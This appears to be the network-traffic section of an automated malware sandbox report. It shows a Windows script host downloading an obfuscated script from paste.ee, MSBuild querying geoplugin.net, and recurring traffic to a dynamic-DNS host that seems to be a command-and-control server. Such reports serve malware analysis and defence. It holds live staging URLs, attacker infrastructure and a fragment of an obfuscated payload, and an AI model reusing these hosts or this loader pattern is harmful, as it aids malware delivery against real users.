                                                                                                                                                                                  Dec 4, 2024 11:12:02.149118900 CET4435000613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.153414965 CET50006443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.153435946 CET4435000613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.166601896 CET50006443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.166609049 CET4435000613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.271253109 CET4435000713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.273806095 CET50007443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.273830891 CET4435000713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.274245024 CET50007443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.274250984 CET4435000713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.365660906 CET4435000813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.368232965 CET50008443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.368262053 CET4435000813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.368633032 CET50008443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.368640900 CET4435000813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.584788084 CET4435000613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.587764978 CET4435000613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.587841034 CET50006443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.587893963 CET50006443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.587908983 CET4435000613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.587918043 CET50006443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.587923050 CET4435000613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.706446886 CET4435000713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.709563017 CET4435000713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.709633112 CET50007443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.709717989 CET50007443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.709744930 CET4435000713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.709758043 CET50007443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.709763050 CET4435000713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.810214043 CET4435000813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.810286999 CET4435000813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.810456038 CET50008443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.810631990 CET50008443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.810631990 CET50008443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:12:02.810652971 CET4435000813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:02.810662985 CET4435000813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:08.098737001 CET642649740160.25.73.25192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:08.121393919 CET497406426192.168.2.4160.25.73.25
                                                                                                                                                                                  Dec 4, 2024 11:12:08.241478920 CET642649740160.25.73.25192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:38.099561930 CET642649740160.25.73.25192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:12:38.101082087 CET497406426192.168.2.4160.25.73.25
                                                                                                                                                                                  Dec 4, 2024 11:12:38.221127033 CET642649740160.25.73.25192.168.2.4
                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Dec 4, 2024 11:08:57.671997070 CET6117153192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 4, 2024 11:08:58.135178089 CET53611711.1.1.1192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:04.337893963 CET4990853192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 4, 2024 11:09:27.548814058 CET5943553192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 4, 2024 11:09:27.847059965 CET53594351.1.1.1192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:09:31.621328115 CET5937653192.168.2.41.1.1.1
                                                                                                                                                                                  Dec 4, 2024 11:09:31.761879921 CET53593761.1.1.1192.168.2.4
                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                  Dec 4, 2024 11:08:57.671997070 CET192.168.2.41.1.1.10xdc57Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 4, 2024 11:09:04.337893963 CET192.168.2.41.1.1.10x178eStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 4, 2024 11:09:27.548814058 CET192.168.2.41.1.1.10x718aStandard query (0)lewisham1122.ddnsking.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 4, 2024 11:09:31.621328115 CET192.168.2.41.1.1.10x2861Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                  Dec 4, 2024 11:08:58.135178089 CET1.1.1.1192.168.2.40xdc57No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 4, 2024 11:08:58.135178089 CET1.1.1.1192.168.2.40xdc57No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 4, 2024 11:09:04.476157904 CET1.1.1.1192.168.2.40x178eNo error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Dec 4, 2024 11:09:16.545243979 CET1.1.1.1192.168.2.40xc9d3No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 4, 2024 11:09:16.545243979 CET1.1.1.1192.168.2.40xc9d3No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 4, 2024 11:09:18.066239119 CET1.1.1.1192.168.2.40x2234No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Dec 4, 2024 11:09:18.066239119 CET1.1.1.1192.168.2.40x2234No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 4, 2024 11:09:27.847059965 CET1.1.1.1192.168.2.40x718aNo error (0)lewisham1122.ddnsking.com160.25.73.25A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 4, 2024 11:09:31.761879921 CET1.1.1.1192.168.2.40x2861No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                  Dec 4, 2024 11:09:56.308213949 CET1.1.1.1192.168.2.40xe0abNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Dec 4, 2024 11:09:56.308213949 CET1.1.1.1192.168.2.40xe0abNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                  • paste.ee
                                                                                                                                                                                  • geoplugin.net
                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.449730104.21.84.67807264C:\Windows\System32\wscript.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 4, 2024 11:08:58.260715961 CET173OUTGET /d/GXRLA HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Language: en-CH
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                  Host: paste.ee
                                                                                                                                                                                  Dec 4, 2024 11:08:59.483275890 CET1001INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                  Date: Wed, 04 Dec 2024 10:08:59 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Location: https://paste.ee/d/GXRLA
                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mSVdROpnql2m%2FG5ZZL049FjmRs0rrxOcqRxuEcVLw0Du0SO699ppbu9WRWR8SCQJV9nKjMjVhYc%2Bxb%2BfGmyIOEOS4q4eeQNFjdUUnkU7KckEGGuqSjKVdRb6iw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8ecaff91f89c43a3-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2011&rtt_var=1005&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=173&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                  Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.449742178.237.33.50807824C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 4, 2024 11:09:31.886862993 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                  Host: geoplugin.net
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Dec 4, 2024 11:09:33.129383087 CET1171INHTTP/1.1 200 OK
                                                                                                                                                                                  date: Wed, 04 Dec 2024 10:09:32 GMT
                                                                                                                                                                                  server: Apache
                                                                                                                                                                                  content-length: 963
                                                                                                                                                                                  content-type: application/json; charset=utf-8
                                                                                                                                                                                  cache-control: public, max-age=300
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                                                                                  Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.449731104.21.84.674437264C:\Windows\System32\wscript.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-04 10:09:00 UTC173OUTGET /d/GXRLA HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Language: en-CH
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                  Host: paste.ee
                                                                                                                                                                                  2024-12-04 10:09:01 UTC1240INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Wed, 04 Dec 2024 10:09:01 GMT
                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=2592000
                                                                                                                                                                                  strict-transport-security: max-age=63072000
                                                                                                                                                                                  x-frame-options: DENY
                                                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                                                                                  content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BjQ%2Bd4ovE4%2BTsUQLPgfSUbybORgVdPV0sOHJ0AY%2F%2FCyRxn2ZjvSA47ze5OPFS9VI%2BsfEmhOjjGYQfIvlf%2FI2lJsWYiCMjXr4xCoGDIZSoANBESy7fLWmPHKQdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8ecaff9d8c5243e9-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  2024-12-04 10:09:01 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 37 33 26 6d 69 6e 5f 72 74 74 3d 31 35 36 39 26 72 74 74 5f 76 61 72 3d 35 39 37 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 37 38 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 38 31 39 33 31 34 26 63 77 6e 64 3d 32 34 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 66 35 38 66 64 39 38 31 63 63 37 34 37 30 39 64 26 74 73 3d 35 33 38 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1569&rtt_var=597&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=787&delivery_rate=1819314&cwnd=241&unsent_bytes=0&cid=f58fd981cc74709d&ts=538&x=0"
                                                                                                                                                                                  2024-12-04 10:09:01 UTC1283INData Raw: 32 66 37 66 0d 0a 0d 0a 20 20 20 20 0d 0a 41 57 41 52 62 6a 63 47 47 4c 68 57 47 4b 65 20 3d 20 22 69 70 4b 4b 63 62 68 68 41 4f 69 65 55 63 47 22 0d 0a 70 6d 74 62 4c 4c 78 72 74 4b 69 65 4b 4c 66 20 3d 20 22 66 53 4e 75 68 4f 52 57 6b 69 63 47 52 74 63 22 0d 0a 48 47 4b 62 4e 65 75 67 61 67 57 4f 70 73 68 20 3d 20 22 57 76 63 47 69 57 63 4c 55 63 62 4c 69 70 72 22 0d 0a 0d 0a 68 66 62 69 7a 57 42 4c 4c 5a 69 4c 6b 6d 68 20 3d 20 22 6f 6c 73 43 76 63 73 47 57 63 6c 63 4c 68 63 22 0d 0a 63 70 68 47 6b 76 57 6f 70 66 49 67 4c 50 6e 20 3d 20 22 61 4e 6f 50 73 55 6e 57 4c 61 6c 6d 65 41 68 22 0d 0a 6b 48 61 4c 47 75 49 6d 4c 4b 6e 70 4c 57 57 20 3d 20 22 42 4c 57 4c 6b 4c 6e 41 6f 52 50 6a 52 68 4c 22 0d 0a 6c 6b 75 4c 69 75 62 5a 62 57 72 4c 4e 54 4e 20 3d
                                                                                                                                                                                  Data Ascii: 2f7f AWARbjcGGLhWGKe = "ipKKcbhhAOieUcG"pmtbLLxrtKieKLf = "fSNuhORWkicGRtc"HGKbNeugagWOpsh = "WvcGiWcLUcbLipr"hfbizWBLLZiLkmh = "olsCvcsGWclcLhc"cphGkvWopfIgLPn = "aNoPsUnWLalmeAh"kHaLGuImLKnpLWW = "BLWLkLnAoRPjRhL"lkuLiubZbWrLNTN =
                                                                                                                                                                                  2024-12-04 10:09:01 UTC1369INData Raw: 66 6f 74 4b 6f 6f 52 50 4b 4f 57 63 20 3d 20 22 55 64 6a 55 55 4c 4f 4f 6e 6c 52 6a 7a 66 68 22 0d 0a 78 75 74 42 68 78 6b 54 47 41 57 4c 4c 69 61 20 3d 20 22 6f 61 71 68 6e 47 4f 70 57 62 4c 51 52 74 57 22 0d 0a 62 4e 50 75 65 4c 69 68 4b 55 47 55 63 50 41 20 3d 20 22 78 50 4c 4e 4e 65 4c 4b 54 6a 4b 6b 57 78 6b 22 0d 0a 61 6c 63 43 64 50 57 4b 4b 7a 63 70 41 7a 75 20 3d 20 22 5a 63 66 65 5a 4a 6e 4c 4c 75 69 6b 41 47 57 22 0d 0a 50 41 66 47 4c 47 6b 41 4c 69 67 63 78 43 7a 20 3d 20 22 57 65 4c 6c 78 73 41 71 66 43 6a 61 66 47 51 22 0d 0a 55 50 63 64 43 7a 63 55 62 49 55 4f 4b 52 73 20 3d 20 22 4a 64 78 69 72 61 71 70 70 63 4e 4b 50 6b 55 22 0d 0a 57 47 66 5a 47 78 50 4b 6d 4b 4c 42 4c 4f 57 20 3d 20 22 4c 4a 71 71 68 57 4e 78 48 4b 64 74 4c 4c 4f 22 0d
                                                                                                                                                                                  Data Ascii: fotKooRPKOWc = "UdjUULOOnlRjzfh"xutBhxkTGAWLLia = "oaqhnGOpWbLQRtW"bNPueLihKUGUcPA = "xPLNNeLKTjKkWxk"alcCdPWKKzcpAzu = "ZcfeZJnLLuikAGW"PAfGLGkALigcxCz = "WeLlxsAqfCjafGQ"UPcdCzcUbIUOKRs = "JdxiraqppcNKPkU"WGfZGxPKmKLBLOW = "LJqqhWNxHKdtLLO"
                                                                                                                                                                                  2024-12-04 10:09:01 UTC1369INData Raw: 22 0d 0a 5a 7a 57 4b 4b 48 55 6b 5a 4b 6c 4b 47 7a 4b 20 3d 20 22 6e 78 69 73 47 6f 5a 55 71 4c 61 61 4f 6f 57 22 0d 0a 4f 64 6a 6f 41 55 53 74 6f 55 55 65 75 4a 4c 20 3d 20 22 4e 4e 62 69 6f 6b 4b 47 57 66 50 6e 70 75 61 22 0d 0a 63 55 4c 63 6e 4c 55 4f 61 6d 57 69 6f 57 41 20 3d 20 22 4b 57 4c 5a 6e 4c 68 63 57 4a 4e 62 57 4e 4c 22 0d 0a 0d 0a 49 75 6e 42 70 6f 6b 68 47 51 68 4b 6d 5a 4c 20 3d 20 22 4e 5a 57 6d 6c 5a 62 4b 55 66 50 6d 57 4c 47 22 0d 0a 4b 64 57 57 67 4c 50 42 4e 6b 65 4f 63 71 6d 20 3d 20 22 4c 57 4c 70 41 4b 64 4b 69 5a 7a 75 57 4c 57 22 0d 0a 7a 74 4c 6c 47 76 63 61 4e 50 6d 57 48 50 4c 20 3d 20 22 61 5a 62 74 63 68 68 6f 52 64 4a 64 6d 4b 63 22 0d 0a 70 66 41 4e 64 4c 47 62 43 4c 4e 6d 54 4f 6e 20 3d 20 22 43 4c 41 69 69 65 4c 4c 78
                                                                                                                                                                                  Data Ascii: "ZzWKKHUkZKlKGzK = "nxisGoZUqLaaOoW"OdjoAUStoUUeuJL = "NNbiokKGWfPnpua"cULcnLUOamWioWA = "KWLZnLhcWJNbWNL"IunBpokhGQhKmZL = "NZWmlZbKUfPmWLG"KdWWgLPBNkeOcqm = "LWLpAKdKiZzuWLW"ztLlGvcaNPmWHPL = "aZbtchhoRdJdmKc"pfANdLGbCLNmTOn = "CLAiieLLx
                                                                                                                                                                                  2024-12-04 10:09:01 UTC1369INData Raw: 53 52 51 63 4c 7a 55 4c 22 0d 0a 49 7a 4c 62 55 73 57 4c 55 68 63 69 41 43 74 20 3d 20 22 78 63 6c 6b 4c 4b 69 57 75 4c 49 7a 6e 4f 57 22 0d 0a 7a 71 69 63 6e 6a 4b 6d 66 57 6a 70 6b 62 4c 20 3d 20 22 50 61 6c 72 66 70 57 55 62 69 6b 41 78 75 65 22 0d 0a 74 7a 63 64 70 78 43 66 55 6b 43 5a 68 69 4c 20 3d 20 22 4b 4a 73 4c 76 61 4c 63 4c 62 75 43 47 53 6c 22 0d 0a 4c 47 55 69 49 69 75 51 7a 69 50 66 68 47 6e 20 3d 20 22 4b 69 52 42 63 48 55 7a 66 72 55 62 6e 63 4e 22 0d 0a 67 4c 6d 66 50 4b 65 7a 43 55 4b 70 6a 68 47 20 3d 20 22 5a 65 52 43 55 57 69 4b 4b 78 6f 57 62 6f 55 22 0d 0a 64 73 50 51 74 57 42 41 69 6e 4a 49 6b 4b 78 20 3d 20 22 63 47 43 7a 63 4c 41 4f 47 66 66 4b 4e 4e 69 22 0d 0a 0d 0a 55 4c 6e 42 66 57 4c 7a 52 50 4e 63 42 57 52 20 3d 20 22 57
                                                                                                                                                                                  Data Ascii: SRQcLzUL"IzLbUsWLUhciACt = "xclkLKiWuLIznOW"zqicnjKmfWjpkbL = "PalrfpWUbikAxue"tzcdpxCfUkCZhiL = "KJsLvaLcLbuCGSl"LGUiIiuQziPfhGn = "KiRBcHUzfrUbncN"gLmfPKezCUKpjhG = "ZeRCUWiKKxoWboU"dsPQtWBAinJIkKx = "cGCzcLAOGffKNNi"ULnBfWLzRPNcBWR = "W
                                                                                                                                                                                  2024-12-04 10:09:01 UTC1369INData Raw: 22 41 70 57 55 73 66 61 6b 6e 4c 61 6d 66 4b 4c 22 0d 0a 55 64 4e 4b 47 7a 4b 74 6d 57 4c 6b 64 63 57 20 3d 20 22 57 69 4a 6c 73 7a 49 61 55 4e 6c 65 50 47 71 22 0d 0a 41 72 6b 47 65 68 57 63 52 47 4f 74 55 57 65 20 3d 20 22 4e 4b 73 4b 65 50 78 74 57 43 55 5a 69 43 70 22 0d 0a 6e 63 41 47 55 57 53 57 69 4f 4c 57 49 64 62 20 3d 20 22 78 7a 78 4b 55 69 43 4f 4c 4e 54 4c 4c 51 78 22 0d 0a 63 41 65 57 6b 70 6d 4c 64 65 70 7a 73 65 68 20 3d 20 22 62 50 6b 4c 41 71 7a 66 4b 74 66 4c 41 6b 6d 22 0d 0a 6b 4c 52 4a 69 4c 6b 4b 69 55 6b 55 70 47 7a 20 3d 20 22 70 4e 6d 4c 70 41 78 43 48 6e 6b 69 70 4e 7a 22 0d 0a 6c 47 72 4c 57 65 61 6e 42 7a 57 66 6c 72 6d 20 3d 20 22 6f 75 69 4b 4c 57 47 50 71 6d 4b 4c 7a 55 47 22 0d 0a 4b 54 5a 62 43 64 6a 4c 6d 4c 4c 4e 64 4f
                                                                                                                                                                                  Data Ascii: "ApWUsfaknLamfKL"UdNKGzKtmWLkdcW = "WiJlszIaUNlePGq"ArkGehWcRGOtUWe = "NKsKePxtWCUZiCp"ncAGUWSWiOLWIdb = "xzxKUiCOLNTLLQx"cAeWkpmLdepzseh = "bPkLAqzfKtfLAkm"kLRJiLkKiUkUpGz = "pNmLpAxCHnkipNz"lGrLWeanBzWflrm = "ouiKLWGPqmKLzUG"KTZbCdjLmLLNdO
                                                                                                                                                                                  2024-12-04 10:09:01 UTC1369INData Raw: 6b 70 4b 20 3d 20 22 4c 4c 70 4e 50 50 6c 4e 54 6b 4e 57 69 52 69 22 0d 0a 48 47 6d 4e 57 5a 6f 62 70 68 57 62 72 61 72 20 3d 20 22 6a 4b 47 4c 68 6f 5a 64 6b 63 57 74 64 71 41 22 0d 0a 6c 65 73 6f 65 47 61 57 6c 76 63 69 4e 7a 65 20 3d 20 22 47 53 57 5a 6b 51 63 71 47 4b 50 55 78 66 69 22 0d 0a 0d 0a 57 47 50 4c 74 47 55 63 43 69 41 4a 69 42 70 20 3d 20 22 75 47 4b 43 47 6f 74 6b 62 78 41 4c 48 63 7a 22 0d 0a 6b 6d 6f 50 4c 6d 64 70 66 65 70 57 75 47 63 20 3d 20 22 5a 43 4b 6a 69 73 50 6d 57 52 51 4f 4c 66 4b 22 0d 0a 6b 50 48 4b 41 50 4f 47 52 67 75 62 69 7a 69 20 3d 20 22 47 72 6b 4b 7a 75 61 64 61 69 62 50 4b 57 4c 22 0d 0a 4e 47 47 4b 47 52 57 7a 47 66 63 61 57 41 7a 20 3d 20 22 64 61 4f 7a 4c 69 6f 6f 63 6b 41 41 6d 63 4e 22 0d 0a 70 6f 43 69 54 69
                                                                                                                                                                                  Data Ascii: kpK = "LLpNPPlNTkNWiRi"HGmNWZobphWbrar = "jKGLhoZdkcWtdqA"lesoeGaWlvciNze = "GSWZkQcqGKPUxfi"WGPLtGUcCiAJiBp = "uGKCGotkbxALHcz"kmoPLmdpfepWuGc = "ZCKjisPmWRQOLfK"kPHKAPOGRgubizi = "GrkKzuadaibPKWL"NGGKGRWzGfcaWAz = "daOzLioockAAmcN"poCiTi
